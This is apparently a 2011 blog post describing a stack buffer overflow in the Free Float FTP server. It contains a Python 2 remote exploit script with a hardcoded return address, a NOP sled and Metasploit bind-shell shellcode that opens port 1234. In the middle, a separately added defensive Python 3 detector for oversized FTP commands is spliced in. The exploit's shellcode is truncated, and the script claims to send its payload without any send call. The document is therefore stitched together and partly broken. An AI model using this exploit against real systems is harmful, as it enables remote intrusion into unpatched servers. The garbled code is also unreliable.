Wednesday, September 28, 2011

Free Float Ftp server stack buffer overflow

First of all I fired the Metasploit fuzzer against this FTP server. The fuzzer worked like butter.
Near 250 bytes of junk the program crashed, and when I checked: yahoooooo.... the offset was overwritten with the Metasploit pattern.
I started writing the exploit. Like always, Python is my best choice for writing exploits, so the exploit code is in Python.
The shellcode added to the exploit spawns a bind shell on port 1234,
generated from the Metasploit Framework.
The bad characters are removed from the shellcode using a Metasploit encoder.
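As an added defender-side example (not code from the original post and not from the Free Float FTP project), here is a small Python 3 checker that flags FTP command lines with the shape described above: an oversized argument, a long run of one filler byte, a high share of non-printable bytes, and a NOP sled. The sample command lines are constructed; the thresholds MAX_ARG_LEN, MAX_NONPRINT_RATIO and MIN_FILLER_RUN are assumptions picked around the roughly 250-byte crash size mentioned above, not values from the post.

```python
# Added example (not from the original post): flag FTP command lines whose
# argument has the shape of a stack-overflow attempt such as the one described
# above. Python 3; the post's own exploit code is Python 2.

MAX_ARG_LEN = 200          # assumption: legitimate arguments stay well under this
MAX_NONPRINT_RATIO = 0.05  # assumption: legitimate arguments are printable ASCII
MIN_FILLER_RUN = 100       # assumption: one byte repeated this often is padding
NOP_SLED = b"\x90" * 8     # eight consecutive x86 NOPs

# Constructed sample lines, as a capture or verbose server log might hold them.
# The third mimics the layout in the post: ~250 bytes of filler, a 4-byte
# return-address slot (placeholder "BBBB" here), a NOP sled, then opaque bytes.
SAMPLE_COMMANDS = [
    b"USER anonymous\r\n",
    b"PASS guest@example.com\r\n",
    b"USER " + b"A" * 251 + b"BBBB" + b"\x90" * 20 + b"\xbd\xe6\x09\xc6" + b"\r\n",
]


def longest_run(data):
    """Length of the longest run of one repeated byte value in data."""
    best = cur = 0
    prev = None
    for b in data:
        cur = cur + 1 if b == prev else 1
        prev = b
        best = max(best, cur)
    return best


def analyze_ftp_command(line):
    """Inspect one raw FTP command line and report overflow-like traits."""
    body = line.rstrip(b"\r\n")
    verb, _, arg = body.partition(b" ")
    findings = []
    if len(arg) > MAX_ARG_LEN:
        findings.append("argument length %d exceeds %d" % (len(arg), MAX_ARG_LEN))
    # Bytes outside printable ASCII; FTP arguments are normally plain text.
    nonprint = sum(1 for b in arg if b < 0x20 or b > 0x7e)
    if arg and nonprint / len(arg) > MAX_NONPRINT_RATIO:
        findings.append("%d non-printable bytes in argument" % nonprint)
    if NOP_SLED in arg:
        findings.append("run of 0x90 bytes (NOP sled) in argument")
    run = longest_run(arg)
    if run >= MIN_FILLER_RUN:
        findings.append("one byte repeated %d times (filler)" % run)
    return {
        "verb": verb.decode("ascii", "replace"),
        "arg_len": len(arg),
        "findings": findings,
        "suspicious": bool(findings),
    }


def scan(lines):
    """Return the analysis of every line that looks suspicious."""
    return [r for r in (analyze_ftp_command(l) for l in lines) if r["suspicious"]]


if __name__ == "__main__":
    for result in scan(SAMPLE_COMMANDS):
        print("%s (%d-byte argument): %s"
              % (result["verb"], result["arg_len"], "; ".join(result["findings"])))
```

On the constructed input the two normal commands pass and the oversized USER line is reported with all four findings. The same checks work on a packet capture or on a server log that records raw command lines; the thresholds are the part to tune per deployment.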

I have published this exploit at Packet Storm Security and Injector.

You can find the exploit code here:
# Exploit Title: Free Float FTP server Response stack Buffer Overflow Exploit
# Date: 21-08-2011
# Author: Debasish Mandal
# Software Link:
# Version: 1.0
# Category: Remote
# Tested on: Windows XP SP2.


import  socket,sys
from struct import pack

buff = "A"* 251 
junk = "A"*5
nop = "\x90"*20
eip = pack('<L',0x77F5801C)

#Shell code generated by the Metasploit Framework.
#Shell Code :: windows/shell/bind_tcp.
#Local PORT :: 1234.
#Neglected BAD CHARACTERS are "\x00", "\x0a" & "\x0d".
shellcode = ("\xbd\xe6\x09\xc6\x4f\xd9\xc4\xd9\x74\x24\xf4\x5a\x33\xc9\xb1"
             # ... remaining shellcode bytes are truncated in the original post ...
             )

buff += eip
buff += nop
buff += shellcode
buff += junk
HOST = raw_input("Enter the target host : ")
PORT = raw_input("Enter the target port (Default 21): ")
print "[*] Connecting to the host "+HOST+" on port "+PORT 
s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
connect=s.connect((HOST, int(PORT)))
print "[*]Connected to target FTP Server!"
print "[*] FTP Server didn't respond\n"
print "[*]Sending PAYLOAD to the target server"
print "[*]Exploit Completed..."
print "[*]Now telnet to the server on port 1234"

# [2011-08-21]